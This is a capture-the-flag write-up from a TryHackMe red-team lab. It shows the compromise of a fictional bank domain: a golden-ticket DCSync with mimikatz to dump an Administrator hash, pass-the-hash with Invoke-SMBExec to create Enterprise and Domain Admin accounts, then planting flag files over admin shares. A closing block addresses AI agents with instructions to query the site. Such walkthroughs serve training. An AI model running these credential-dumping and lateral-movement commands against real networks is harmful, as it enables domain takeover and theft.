# Full Compromise of BANK Domain ## Used Tools Powershell Mimikatz PsExec Invoke-SMBExec.ps1 Remmina Windows Remote Desktop ## Summary Within the context of the administrator created by our golden ticket, we are able to retrieve the hash of the local administrator. With this, we are using SMBExec to place our own user equipped with all the rights necessary to do anything on the rootdc. Thence force we are able to connect to the bankdc, create our own user in the bank domain and place with these users the proof of compromises on all the machines available. ## Investigation From the child domain, we are not able to reach the bankdc directory.

As already mentioned in the previous section, we’ll use the running webservers on attack machine and the VPN to get the tools PSExec and SMBExec.

Starting a second Powershell as Administrator to run PSExec to validate Commands dropped via SMBExec Running PSExec in the context of the Administrator we impersonate through the golden ticket we are able to connect to the rootdc and run a command line. ``` PS C:\Users\0xb0b\Documents> .\PsExec.exe \\rootdc.thereserve.loc cmd.exe ``` With the connection established, we try to add our rootdc user but are not able to do so. `New-ADUser 0xb0b_rootdc` `Add-ADGroupMember -Identity 'Enterprise Admins' -Members 0xb0b_rootdc` `Add-ADGroupMember -Identity 'Domain Admins' -Members 0xb0b_rootdc` `Set-ADAccountPassword -Identity 0xb0b_rootdc-NewPassword (ConvertTo-SecureString -AsPlainText 'WhoKnows1337Me!' -Force)` `Enable-ADAccount -Identity '0xb0b_rootdc'`

The next idea is to retrieve the Administrator hash we originally wanted to get in the full Compromise Parent Domain section. Now within the context of the golden ticket, we are able to retrieve the hash with already retrieved the SID in the last section. `lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500` Without golden ticket administrator impersonation:

With golden ticket administrator impersonation:

And we have the Administrator hash: `58a478135a93ac3bf058a5ea0e8fdb71` With this hash, we are able to pass the hash in running SMB-Exec to drop our commands there to add a user to the rootdc. We won’t get any feedback, but we still have PSExec running which comes in handy, because now we can check if our input is successful.

Running `Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "mkdir C:\Test" -verbose` to create a directory on `C:\` drive of the rootdc.

And we check if it is there in the PsExec session:

Now we add a User to ROOTDC allows us to access BANKDC with that user equipping the user with the full portfolio of rights via adding the user to the Domain Admins and Enterprise Admins groups. ```powershell Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "powershell.exe New-ADUser 0xb0b_rootdc" -verbose Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "powershell.exe Add-ADGroupMember -Identity 'Enterprise Admins' -Members 0xb0b_rootdc" -verbose Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "powershell.exe Add-ADGroupMember -Identity 'Domain Admins' -Members 0xb0b_rootdc" -verbose Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "powershell.exe Set-ADAccountPassword -Identity 0xb0b_rootdc -NewPassword (ConvertTo-SecureString -AsPlainText 'WhoKnows1337Me!' -Force)" -verbose Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "powershell.exe Enable-ADAccount -Identity '0xb0b_rootdc'" -verbose ``` Everything runs through to create the rootdc user.

And we have a user on rootdc.

Checking out the correct domains via Active Directory Domains and Trusts on the child domain corpdc.

And from the corpdc we are able to connect to the rootdc via Windows Remote Desktop and our newly created rootdc user.

And from the corpdc we are able to connect to the bankdc via Windows Remote Desktop and our newly created rootdc user.

From there we are still not able to place our proof of compromises on all the machines in the bank domain, because our rootdc user doesnt exist here. So we created another user 0xb0b on the bankdc.

Next, we try to place our proof of compromises on all machines with the use of `runas` so we don’t have to use RDP for every single machine.

To not have all the time entering a password by running `runas` we just open a `cmd` as `bank/0xb0b` where `/k` doesn’t close the terminal and run our commands from there to place our proofs.

## Flag-9: Foothold on Bank Division Tier 2 Infrastructure ``` echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\work1.bank.thereserve.loc\c$\Windows\Temp\0xb0b.txt ``` ``` dir \\work1.bank.thereserve.loc\c$\Windows\Temp\0xb0b.txt ```

## Flag-10: Administrative access to Bank Division Tier 2 Infrastructure ``` mkdir \\work1.bank.thereserve.loc\c$\Users\Administrator ``` ``` echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\work1.bank.thereserve.loc\c$\Users\Administrator\0xb0b.txt ``` ``` dir \\work1.bank.thereserve.loc\c$\Users\Administrator\0xb0b.txt ```

## Flag-11: Foothold on Bank Division Tier 1 Infrastructure ``` echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\jmp.bank.thereserve.loc\c$\Windows\Temp\0xb0b.txt ``` ``` dir \\jmp.bank.thereserve.loc\c$\Windows\Temp\0xb0b.txt ```

## Flag-12: Administrative access to Bank Division Tier 1 Infrastructure

``` mkdir \\jmp.bank.thereserve.loc\c$\Users\Administrator ``` ``` echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\jmp.bank.thereserve.loc\c$\Users\Administrator\0xb0b.txt ``` ``` dir \\jmp.bank.thereserve.loc\c$\Users\Administrator\0xb0b.txt ```

## Flag-13: Foothold on Bank Division Tier 0 Infrastructure ``` echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > C:\Windows\Temp\0xb0b.txt ```

## Flag-14: Administrative access to Bank Division Tier 0 Infrastructure ``` echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > C:\Users\Administrator\0xb0b.txt ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/tryhackme/red-team-capstone-challenge/full-compromise-of-bank-domain.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.